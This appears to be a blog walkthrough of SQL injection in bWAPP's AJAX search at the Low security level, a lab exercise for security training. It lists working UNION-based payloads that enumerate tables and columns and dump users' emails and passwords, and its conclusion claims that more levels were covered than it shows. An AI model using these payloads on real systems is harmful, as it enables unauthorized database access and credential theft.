In this walk through, we will be going through the SQL Injection (AJAX,JSON,jQuery) vulnerability section from bWAPP Labs. We will be exploring and exploiting SQL Injection in AJAX, JSON & jQuery implementations and learn how application are affected because of it. So, let’s get started with the Hacking without any delay.
Table of Contents
Security: Low
- Setting the security level to Low.
- The application uses a AJAX search functionality where the the application dynamically shows result as the user types inside the search box.
- I used the below payload to see all the movie titles inside the database. We will use the same format to dump all the contents from the Database by using AJAX.
' -- #
- Let’s move ahead a little and dump whole database with emails and passwords of the users in the application. We will start by checking the no. of columns in the database. For that, we used ORDER BY clause, as we can see we hit an “No movies were found” error on column 8 but no error on column 7. That means, there are 7 columns in the DB.
' ORDER BY 8 -- # ' ORDER BY 7 -- #
- Let’s find out which column can be used to retrieve data. Here, the second data got reflected in the front end.
' UNION SELECT NULL,"asd",NULL,NULL,NULL,NULL,NULL -- #
- Moving on, let’s dump the database name using the below payload.
' UNION SELECT NULL,database(),NULL,NULL,NULL,NULL,NULL -- #
- Now we have our database name “bWAPP”. Let’s find out the tables inside it using the below payload.
' UNION SELECT NULL,table_name,NULL,NULL,NULL,NULL,NULL from information_schema.tables where table_schema=database() -- #
- Out of the above dumped table, the “users” tables seems interesting. Let’s dump the no. of columns inside it with the below payload.
' UNION SELECT NULL,column_name,NULL,NULL,NULL,NULL,NULL from information_schema.columns where table_name='users' -- #
- Let’s dump email and password with the below payload.
' UNION SELECT NULL,email,password,NULL,NULL,NULL,NULL from users -- #
Also Read: bWAPP – Session Management (Session ID in URL)
Conclusion:
So, we finally completed all the security levels for the bWAPP SQL Injection (AJAX,JSON,jQuery) Vulnerability. We looked into the various ways how application has been set up in various levels and how we can bypass the security controls implemented. Next, we can mitigate the potential SQL Injection attacks by performing input sanitization and using prepared statements or parametrized queries for every SQL query made by the application to the database. On that note, i will take your leave and will meet you in next one with another bWAPP vulnerability writeup, till then “Keep Hacking”.